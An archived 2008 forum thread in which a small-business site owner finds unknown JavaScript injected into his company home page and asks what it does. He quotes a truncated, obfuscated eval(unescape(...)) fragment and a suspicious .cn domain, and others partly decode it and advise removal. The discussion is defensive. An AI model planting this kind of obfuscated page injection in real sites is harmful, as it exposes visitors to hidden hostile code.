Strange behaviour

Discussion in 'HTML' started by John Clayton, Jan 6, 2008.

  1. John Clayton

    John Clayton Guest

    Looking at my company home page, I get asked if it can set a cookie.
    I've never , ever included these devices on either of the sites I've built.
    Looking at the source code there is some stuff in comments I never put in
    there.
    I'll remove it in next day or so, but before I do can any one please tell me
    what it might be?

    Our hosting company (Netcetera) has just yesterday altered ftp access codes
    for both sites as part of their "security review".
    Seems to me this one's been hacked into.
    Can anyone guess to what purpose please?
    Many thanks.

    The code is just after <body bgcolor= , which is now repeated - as is this
    "cuckoo code". this starts off "var msg=314, d=document

    This page is;- www.ossettmouldings.com/default.htm

    I've only looked at one or two others - they seem OK.

    John
    John Clayton, Jan 6, 2008
    #1
    1. Advertising

  2. John Clayton

    Vince Morgan Guest

    "John Clayton" <> wrote in message
    news:flrp9t$apg$...
    > Looking at my company home page, I get asked if it can set a cookie.
    > I've never , ever included these devices on either of the sites I've

    built.
    > Looking at the source code there is some stuff in comments I never put in
    > there.
    > I'll remove it in next day or so, but before I do can any one please tell

    me
    > what it might be?
    >
    > Our hosting company (Netcetera) has just yesterday altered ftp access

    codes
    > for both sites as part of their "security review".
    > Seems to me this one's been hacked into.
    > Can anyone guess to what purpose please?
    > Many thanks.
    >
    > The code is just after <body bgcolor= , which is now repeated - as is this
    > "cuckoo code". this starts off "var msg=314, d=document
    >
    > This page is;- www.ossettmouldings.com/default.htm


    I don't think anyone here is going to be in a hurry to open this page.
    Looks like they've added a little javascript. Posting the offending code
    would be better.
    Vince
    Vince Morgan, Jan 7, 2008
    #2
    1. Advertising

  3. John Clayton

    Neredbojias Guest

    Well bust mah britches and call me cheeky, on Sun, 06 Jan 2008 23:47:11
    GMT John Clayton scribed:

    > Looking at my company home page, I get asked if it can set a cookie.
    > I've never , ever included these devices on either of the sites I've
    > built. Looking at the source code there is some stuff in comments I
    > never put in there.
    > I'll remove it in next day or so, but before I do can any one please
    > tell me what it might be?
    >
    > Our hosting company (Netcetera) has just yesterday altered ftp access
    > codes for both sites as part of their "security review".
    > Seems to me this one's been hacked into.
    > Can anyone guess to what purpose please?
    > Many thanks.
    >
    > The code is just after <body bgcolor= , which is now repeated - as is
    > this "cuckoo code". this starts off "var msg=314, d=document
    >
    > This page is;- www.ossettmouldings.com/default.htm
    >
    > I've only looked at one or two others - they seem OK.


    Dunno, but whatever it's theoretically suppose to do fails, anyway (-on a
    secure receiver.)

    58 html errors! That you or the hacker? I noticed <html> _before_ the
    doctype, among other things. -And 2 opening body tags... Tsk, tsk.

    --
    Neredbojias
    Riches are their own reward.
    Neredbojias, Jan 7, 2008
    #3
  4. John Clayton

    John Clayton Guest


    >> Looking at the source code there is some stuff in comments I never put in
    >> there.
    >> I'll remove it in next day or so, but before I do can any one please tell

    > me
    >> what it might be?
    >>
    >> Our hosting company (Netcetera) has just yesterday altered ftp access

    > codes
    >> for both sites as part of their "security review".
    >> Seems to me this one's been hacked into.
    >> Can anyone guess to what purpose please?
    >> Many thanks.
    >>
    >> The code is just after <body bgcolor= , which is now repeated - as is
    >> this
    >> "cuckoo code". this starts off "var msg=314, d=document
    >>
    >> This page is;- www.ossettmouldings.com/default.htm

    >
    > I don't think anyone here is going to be in a hurry to open this page.
    > Looks like they've added a little javascript. Posting the offending code
    > would be better.
    > Vince
    >
    >

    Vince,
    As you say, it looks to me also like a bit of script. It reads;-

    <!--
    var msg=314,d=document;
    eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
    continues for absolutely ages and concludes with ;))
    //-->

    The "cookie" appears to originate from ;- tanikinata.cn

    I'm just wondering what it's doiong/ attempting to do?
    John Clayton, Jan 7, 2008
    #4
  5. John Clayton wrote:
    >>> Looking at the source code there is some stuff in comments I never put in
    >>> there.
    >>> I'll remove it in next day or so, but before I do can any one please tell

    >> me
    >>> what it might be?
    >>>
    >>> Our hosting company (Netcetera) has just yesterday altered ftp access

    >> codes
    >>> for both sites as part of their "security review".
    >>> Seems to me this one's been hacked into.
    >>> Can anyone guess to what purpose please?
    >>> Many thanks.
    >>>
    >>> The code is just after <body bgcolor= , which is now repeated - as is
    >>> this
    >>> "cuckoo code". this starts off "var msg=314, d=document
    >>>
    >>> This page is;- www.ossettmouldings.com/default.htm

    >> I don't think anyone here is going to be in a hurry to open this page.
    >> Looks like they've added a little javascript. Posting the offending code
    >> would be better.
    >> Vince
    >>
    >>

    > Vince,
    > As you say, it looks to me also like a bit of script. It reads;-
    >
    > <!--
    > var msg=314,d=document;
    > eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
    > continues for absolutely ages and concludes with ;))
    > //-->


    Well the first part translates "window.status='D"

    > The "cookie" appears to originate from ;- tanikinata.cn
    >
    > I'm just wondering what it's doiong/ attempting to do?


    Something *not* good. If they have to hide it there is a reason....

    --
    Take care,

    Jonathan
    -------------------
    LITTLE WORKS STUDIO
    http://www.LittleWorksStudio.com
    Jonathan N. Little, Jan 7, 2008
    #5
  6. John Clayton

    Vince Morgan Guest

    "John Clayton" <> wrote in message
    news:fltuhi$hrg$...
    >
    > Vince,
    > As you say, it looks to me also like a bit of script. It reads;-
    >
    > <!--
    > var msg=314,d=document;
    > eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
    > continues for absolutely ages and concludes with ;))
    > //-->
    >
    > The "cookie" appears to originate from ;- tanikinata.cn
    >
    > I'm just wondering what it's doiong/ attempting to do?
    >
    >

    There isn't anyway of knowing what it was meant to achieve John without
    seeing all the code.
    Jonathan nailed the first line, but without the rest would be a shot in the
    dark.
    Vince
    Vince Morgan, Jan 7, 2008
    #6
  7. John Clayton

    John Clayton Guest

    "Neredbojias" <> wrote in message
    news:Xns9A1DE7A65BDD5nanopandaneredbojias@85.214.90.236...
    > Well bust mah britches and call me cheeky, on Sun, 06 Jan 2008 23:47:11
    > GMT John Clayton scribed:
    >
    >> Looking at my company home page, I get asked if it can set a cookie.
    >> I've never , ever included these devices on either of the sites I've
    >> built. Looking at the source code there is some stuff in comments I
    >> never put in there.
    >> I'll remove it in next day or so, but before I do can any one please
    >> tell me what it might be?


    Thank you for your observations and advice people, Vince, Johnathan and
    Neredbojias. I've taken the "cuckoo" js script out the back and shot it
    dead - now we may never discover it's purpose in life.
    I'll tidy up me html one day - ta.

    John
    "Live long and prosper"
    John Clayton, Jan 8, 2008
    #7
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Antonio

    Strange encoding behaviour

    Antonio, Dec 29, 2004, in forum: ASP .Net
    Replies:
    0
    Views:
    422
    Antonio
    Dec 29, 2004
  2. Jan
    Replies:
    2
    Views:
    1,426
    Mike Treseler
    Dec 16, 2004
  3. David Cantin

    Strange behaviour with perl and apache

    David Cantin, Nov 3, 2003, in forum: Perl
    Replies:
    1
    Views:
    453
    Jim Gibson
    Nov 3, 2003
  4. Dennis Johansson
    Replies:
    1
    Views:
    499
    Dennis Johansson
    Aug 21, 2003
  5. Andy Chambers
    Replies:
    1
    Views:
    383
    Daniel Dyer
    May 14, 2007
Loading...

Share This Page